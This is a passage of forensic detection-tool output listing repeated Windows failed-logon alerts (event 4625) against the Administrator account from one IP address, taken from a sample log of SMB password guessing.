+2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: 
